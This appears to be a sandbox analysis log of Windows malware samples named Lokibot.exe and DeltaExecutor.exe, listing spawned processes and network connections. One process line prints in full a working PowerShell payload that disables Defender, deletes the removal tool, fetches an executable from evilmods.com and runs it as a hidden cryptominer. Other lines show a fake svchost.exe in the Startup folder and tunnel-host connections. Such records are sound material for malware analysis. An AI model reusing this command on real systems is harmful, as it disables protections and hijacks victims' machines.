C:\Users\Admin\Downloads\Lokibot.exe

"C:\Users\Admin\Downloads\Lokibot.exe"

C:\Users\Admin\Downloads\Lokibot.exe

"C:\Users\Admin\Downloads\Lokibot.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6732 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7908 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8456 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7160 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8100 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7760 /prefetch:1

C:\Users\Admin\Downloads\Lokibot.exe

"C:\Users\Admin\Downloads\Lokibot.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8460 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8216 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7520 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8748 /prefetch:1

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8308 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8916 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8100 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1760 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6748 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6740 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"

C:\Users\Admin\Downloads\DeltaExecutor\DeltaExecutor.exe

"C:\Users\Admin\Downloads\DeltaExecutor\DeltaExecutor.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://igk.filexspace.com/getfile/QDJEILD?title=DependencyCore&tracker=erg3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0x104,0x128,0x7ff8ea8346f8,0x7ff8ea834708,0x7ff8ea834718

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -ExecutionPolicy Bypass -Command "Register-ScheduledTask -TaskName MicrosoftConsoleSetup -Action (New-ScheduledTaskAction -Execute cmd -Argument '/c start /min \"\" powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"reg add ''HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications'' /v DisableNotifications /t REG_DWORD /d 1 /f /reg:64; reg add ''HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter'' /v Enabled /t REG_DWORD /d 0 /f /reg:64; reg add ''HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths'' /f /reg:64; reg add ''HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths'' /v ''C:\ProgramData'' /d 0 /f /reg:64; wusa /uninstall /kb:890830 /quiet /norestart; Remove-Item -Path ''C:\Windows\System32\mrt.exe'' -Force -Confirm:$false; reg add ''HKLM\SOFTWARE\Policies\Microsoft\MRT'' /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f /reg:64; New-Item -Path \\.\C:\ProgramData\Con\ -ItemType Directory; (Get-Item \\.\C:\ProgramData\Con\).Attributes = ''ReadOnly, Hidden, System''; Invoke-WebRequest -Uri https://evilmods.com/api/nothingtoseehere.exe -OutFile C:\ProgramData\Con\services.exe; Set-ScheduledTask -TaskName MicrosoftConsole -Trigger (New-ScheduledTaskTrigger -AtLogOn); Unregister-ScheduledTask -TaskName MicrosoftConsoleSetup -Confirm:$false; Start-ScheduledTask -TaskName MicrosoftConsole;\"') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0 -Priority 1 -Hidden -DisallowHardTerminate -DontStopOnIdleEnd) -RunLevel Highest -Force; Register-ScheduledTask -TaskName MicrosoftConsole -Action (New-ScheduledTaskAction -Execute cmd -Argument '/c start /min \"\" powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command \"reg add ''HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications'' /v DisableNotifications /t REG_DWORD /d 1 /f /reg:64; reg add ''HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter'' /v Enabled /t REG_DWORD /d 0 /f /reg:64; reg add ''HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths'' /f /reg:64; reg add ''HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths'' /v ''C:\ProgramData'' /d 0 /f /reg:64; wusa /uninstall /kb:890830 /quiet /norestart; Remove-Item -Path ''C:\Windows\System32\mrt.exe'' -Force -Confirm:$false; reg add ''HKLM\SOFTWARE\Policies\Microsoft\MRT'' /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f /reg:64; C:\ProgramData\Con\services.exe --algo AUTOLYKOS2 --pool erg.2miners.com:18888 --user bc1qxhp6mn0h7k9r89w8amalqjn38t4j5yaa7t89rp.oFbSrB2Axq --tls on --log off\"') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0 -Priority 1 -Hidden -DisallowHardTerminate -DontStopOnIdleEnd) -RunLevel Highest -Force;"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8620 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8264 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7820 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1214183341281466566,17059158159146646631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7132 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 wearedevs.net udp
US 104.26.6.147:80 wearedevs.net tcp
US 104.26.6.147:80 wearedevs.net tcp
US 104.26.6.147:443 wearedevs.net tcp
US 8.8.8.8:53 147.6.26.104.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 cdn.wearedevs.net udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
FR 142.250.201.162:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 region1.analytics.google.com udp
US 8.8.8.8:53 stats.g.doubleclick.net udp
US 8.8.8.8:53 www.google.co.uk udp
US 216.239.32.36:443 region1.analytics.google.com tcp
GB 74.125.133.155:443 stats.g.doubleclick.net tcp
FR 216.58.214.67:443 www.google.co.uk tcp
US 8.8.8.8:53 fundingchoicesmessages.google.com udp
FR 142.250.179.78:443 fundingchoicesmessages.google.com tcp
US 8.8.8.8:53 170.201.250.142.in-addr.arpa udp
US 8.8.8.8:53 168.201.250.142.in-addr.arpa udp
US 8.8.8.8:53 163.20.217.172.in-addr.arpa udp
US 8.8.8.8:53 162.20.217.172.in-addr.arpa udp
US 8.8.8.8:53 233.133.159.162.in-addr.arpa udp
US 8.8.8.8:53 162.201.250.142.in-addr.arpa udp
US 8.8.8.8:53 36.32.239.216.in-addr.arpa udp
US 8.8.8.8:53 155.133.125.74.in-addr.arpa udp
US 8.8.8.8:53 67.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 78.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 110.179.250.142.in-addr.arpa udp
FR 142.250.179.78:443 fundingchoicesmessages.google.com udp
US 8.8.8.8:53 lh3.googleusercontent.com udp
FR 142.250.179.97:443 lh3.googleusercontent.com tcp
US 8.8.8.8:53 97.179.250.142.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 ep1.adtrafficquality.google udp
FR 142.250.179.98:443 ep1.adtrafficquality.google tcp
US 8.8.8.8:53 ep2.adtrafficquality.google udp
FR 142.250.178.129:443 ep2.adtrafficquality.google tcp
US 8.8.8.8:53 tpc.googlesyndication.com udp
FR 142.250.201.162:443 googleads.g.doubleclick.net udp
FR 142.250.178.129:443 ep2.adtrafficquality.google udp
US 8.8.8.8:53 www.google.com udp
FR 216.58.214.161:443 tpc.googlesyndication.com tcp
FR 216.58.214.161:443 tpc.googlesyndication.com tcp
FR 216.58.214.161:443 tpc.googlesyndication.com tcp
FR 216.58.214.161:443 tpc.googlesyndication.com tcp
FR 216.58.214.161:443 tpc.googlesyndication.com tcp
FR 172.217.20.164:443 www.google.com tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 98.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 129.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 161.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 164.20.217.172.in-addr.arpa udp
FR 216.58.214.161:443 tpc.googlesyndication.com udp
FR 172.217.20.164:443 www.google.com udp
US 8.8.8.8:53 195.20.217.172.in-addr.arpa udp
GB 2.16.153.198:443 www.bing.com tcp
GB 2.16.153.198:443 www.bing.com tcp
FR 142.250.179.98:443 ep1.adtrafficquality.google udp
US 8.8.8.8:53 198.153.16.2.in-addr.arpa udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 th.bing.com udp
GB 2.16.153.224:443 r.bing.com tcp
GB 2.16.153.224:443 r.bing.com tcp
GB 23.73.138.82:443 th.bing.com tcp
GB 23.73.138.82:443 th.bing.com tcp
US 8.8.8.8:53 224.153.16.2.in-addr.arpa udp
US 8.8.8.8:53 82.138.73.23.in-addr.arpa udp
US 8.8.8.8:53 login.microsoftonline.com udp
NL 20.190.160.20:443 login.microsoftonline.com tcp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 216.239.32.36:443 region1.analytics.google.com udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 8.8.8.8:53 github.githubassets.com udp
US 185.199.111.133:443 avatars.githubusercontent.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 8.8.8.8:53 user-images.githubusercontent.com udp
US 185.199.111.133:443 user-images.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 collector.github.com udp
US 185.199.109.154:443 github.githubassets.com tcp
US 8.8.8.8:53 api.github.com udp
US 140.82.113.22:443 collector.github.com tcp
US 140.82.113.22:443 collector.github.com tcp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 154.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 210.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 22.113.82.140.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 0.tcp.ngrok.io udp
US 3.137.60.53:19521 0.tcp.ngrok.io tcp
US 168.61.222.215:5400 tcp
US 3.137.60.53:19521 0.tcp.ngrok.io tcp
US 3.137.60.53:19521 0.tcp.ngrok.io tcp
US 8.8.8.8:53 startitit2-23969.portmap.host udp
US 3.137.60.53:19521 0.tcp.ngrok.io tcp
GB 2.16.153.222:443 www.bing.com tcp
GB 2.16.153.222:443 www.bing.com tcp
GB 2.16.153.222:443 www.bing.com tcp
US 8.8.8.8:53 222.153.16.2.in-addr.arpa udp
US 8.8.8.8:53 delta-executor.com udp
US 8.8.8.8:53 startitit2-23969.portmap.host udp
US 3.137.60.53:19521 0.tcp.ngrok.io tcp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
US 8.8.4.4:53 google.com udp
US 8.8.8.8:53 4.4.8.8.in-addr.arpa udp
US 8.8.8.8:53 startitit2-23969.portmap.host udp
US 168.61.222.215:5400 tcp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 th.bing.com udp
GB 2.16.153.206:443 th.bing.com tcp
GB 2.16.153.222:443 th.bing.com tcp
GB 2.16.153.222:443 th.bing.com tcp
GB 2.16.153.206:443 th.bing.com tcp
US 8.8.8.8:53 bing.com udp
US 204.79.197.200:443 bing.com tcp
US 8.8.8.8:53 206.153.16.2.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 3.137.60.53:19521 0.tcp.ngrok.io tcp
US 8.8.8.8:53 startitit2-23969.portmap.host udp
FR 185.136.161.124:6128 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 startitit2-23969.portmap.host udp
FR 185.136.161.124:6128 tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 3.137.60.53:19521 0.tcp.ngrok.io tcp
US 8.8.8.8:53 startitit2-23969.portmap.host udp
US 8.8.8.8:53 startitit2-23969.portmap.host udp
US 168.61.222.215:5400 tcp
US 8.8.8.8:53 startitit2-23969.portmap.host udp
US 8.8.8.8:53 0.tcp.ngrok.io udp
US 18.190.63.84:19521 0.tcp.ngrok.io tcp
US 8.8.8.8:53 sourceforge.net udp
US 104.18.12.149:443 sourceforge.net tcp
US 104.18.12.149:443 sourceforge.net tcp
US 8.8.8.8:53 challenges.cloudflare.com udp
US 104.18.94.41:443 challenges.cloudflare.com tcp
US 104.18.94.41:443 challenges.cloudflare.com tcp
US 8.8.8.8:53 149.12.18.104.in-addr.arpa udp
US 8.8.8.8:53 41.94.18.104.in-addr.arpa udp
US 8.8.8.8:53 startitit2-23969.portmap.host udp
US 8.8.8.8:53 a.fsdn.com udp
US 104.18.16.56:443 a.fsdn.com tcp
US 104.18.16.56:443 a.fsdn.com tcp
US 104.18.16.56:443 a.fsdn.com tcp
US 104.18.16.56:443 a.fsdn.com tcp
US 104.18.16.56:443 a.fsdn.com tcp
US 104.18.16.56:443 a.fsdn.com tcp
US 104.18.16.56:443 a.fsdn.com tcp
US 104.18.16.56:443 a.fsdn.com tcp
US 8.8.8.8:53 d.delivery.consentmanager.net udp
US 8.8.8.8:53 cdn.consentmanager.net udp
US 8.8.8.8:53 c.sf-syn.com udp
DE 87.230.98.76:443 d.delivery.consentmanager.net tcp
GB 84.17.50.9:443 cdn.consentmanager.net tcp
US 104.18.5.227:443 c.sf-syn.com tcp
US 8.8.8.8:53 56.16.18.104.in-addr.arpa udp
US 8.8.8.8:53 9.50.17.84.in-addr.arpa udp
US 8.8.8.8:53 227.5.18.104.in-addr.arpa udp
US 8.8.8.8:53 76.98.230.87.in-addr.arpa udp
DE 87.230.98.76:443 d.delivery.consentmanager.net tcp
US 18.190.63.84:19521 0.tcp.ngrok.io tcp
US 8.8.8.8:53 startitit2-23969.portmap.host udp
FR 185.136.161.124:8761 tcp
US 8.8.8.8:53 0.tcp.ngrok.io udp
US 8.8.8.8:53 startitit2-23969.portmap.host udp
US 3.12.245.36:19521 0.tcp.ngrok.io tcp
FR 185.136.161.124:8761 tcp
US 8.8.8.8:53 as.sourceforge.net udp
US 8.8.8.8:53 securepubads.g.doubleclick.net udp
US 8.8.8.8:53 analytics.slashdotmedia.com udp
US 8.8.8.8:53 btloader.com udp
US 8.8.8.8:53 ml314.com udp
US 8.8.8.8:53 j.6sc.co udp
US 216.105.38.9:443 analytics.slashdotmedia.com tcp
FR 216.58.213.66:443 securepubads.g.doubleclick.net tcp
US 172.67.41.60:443 btloader.com tcp
US 172.64.147.137:443 as.sourceforge.net tcp
US 34.117.77.79:443 ml314.com tcp
GB 23.48.165.145:443 j.6sc.co tcp
US 168.61.222.215:5400 tcp
US 8.8.8.8:53 bt.dns-finder.com udp
US 8.8.8.8:53 ad-delivery.net udp
US 34.117.77.79:443 ml314.com udp
US 172.64.147.137:443 as.sourceforge.net tcp
US 104.26.3.70:443 ad-delivery.net tcp
US 104.26.3.70:443 ad-delivery.net tcp
US 172.67.134.120:443 bt.dns-finder.com tcp
US 8.8.8.8:53 ipv6.6sc.co udp
US 8.8.8.8:53 c.6sc.co udp
US 8.8.8.8:53 b.6sc.co udp
GB 23.48.165.145:443 b.6sc.co tcp
US 172.64.147.137:443 as.sourceforge.net tcp
US 8.8.8.8:53 api.btloader.com udp
US 8.8.8.8:53 region1.google-analytics.com udp
GB 23.48.165.145:443 b.6sc.co tcp
US 130.211.23.194:443 api.btloader.com tcp
US 130.211.23.194:443 api.btloader.com tcp
US 8.8.8.8:53 ib.adnxs.com udp
US 8.8.8.8:53 idsync.rlcdn.com udp
US 8.8.8.8:53 dpm.demdex.net udp
US 8.8.8.8:53 match.adsrvr.org udp
US 8.8.8.8:53 ps.eyeota.net udp
FR 216.58.213.66:443 securepubads.g.doubleclick.net udp
US 216.239.32.36:443 region1.google-analytics.com tcp
NL 185.89.210.46:443 ib.adnxs.com tcp
US 35.244.174.68:443 idsync.rlcdn.com tcp
US 8.8.8.8:53 60.41.67.172.in-addr.arpa udp
US 8.8.8.8:53 79.77.117.34.in-addr.arpa udp
US 8.8.8.8:53 137.147.64.172.in-addr.arpa udp
US 8.8.8.8:53 145.165.48.23.in-addr.arpa udp
US 8.8.8.8:53 66.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 9.38.105.216.in-addr.arpa udp
DE 18.184.216.10:443 ps.eyeota.net tcp
IE 52.212.200.255:443 dpm.demdex.net tcp
US 8.8.8.8:53 70.3.26.104.in-addr.arpa udp
US 8.8.8.8:53 120.134.67.172.in-addr.arpa udp
US 8.8.8.8:53 166.20.217.172.in-addr.arpa udp
US 130.211.23.194:443 api.btloader.com tcp
NL 185.89.210.46:443 ib.adnxs.com tcp
US 8.8.8.8:53 startitit2-23969.portmap.host udp
US 8.8.8.8:53 601cf9249ee5244a36f479b7d3c0c3fc.safeframe.googlesyndication.com udp
FR 142.250.179.98:443 ep1.adtrafficquality.google udp
US 8.8.8.8:53 static.criteo.net udp
US 8.8.8.8:53 cdn-ima.33across.com udp
US 8.8.8.8:53 tags.crwdcntrl.net udp
US 8.8.8.8:53 invstatic101.creativecdn.com udp
FR 216.58.214.65:443 601cf9249ee5244a36f479b7d3c0c3fc.safeframe.googlesyndication.com tcp
US 104.18.28.101:443 cdn-ima.33across.com tcp
US 34.96.70.87:443 invstatic101.creativecdn.com tcp
FR 18.155.129.56:443 tags.crwdcntrl.net tcp
NL 178.250.1.3:443 static.criteo.net tcp
US 8.8.8.8:53 crt.rootg2.amazontrust.com udp
FR 3.164.163.87:80 crt.rootg2.amazontrust.com tcp
FR 142.250.178.129:443 ep2.adtrafficquality.google udp
US 8.8.8.8:53 68.174.244.35.in-addr.arpa udp
US 8.8.8.8:53 255.200.212.52.in-addr.arpa udp
US 8.8.8.8:53 10.216.184.18.in-addr.arpa udp
US 8.8.8.8:53 194.23.211.130.in-addr.arpa udp
US 8.8.8.8:53 65.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 101.28.18.104.in-addr.arpa udp
US 8.8.8.8:53 87.70.96.34.in-addr.arpa udp
US 8.8.8.8:53 56.129.155.18.in-addr.arpa udp
US 8.8.8.8:53 3.1.250.178.in-addr.arpa udp
US 216.239.32.36:443 region1.google-analytics.com udp
US 216.105.38.9:443 analytics.slashdotmedia.com tcp
US 8.8.8.8:53 5b0944898990b3cfd32417ac47b075e9.safeframe.googlesyndication.com udp
US 216.105.38.9:443 analytics.slashdotmedia.com tcp
US 8.8.8.8:53 87.163.164.3.in-addr.arpa udp
US 8.8.8.8:53 51.201.222.52.in-addr.arpa udp
US 8.8.8.8:53 66.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 46.210.89.185.in-addr.arpa udp
US 130.211.23.194:443 api.btloader.com udp
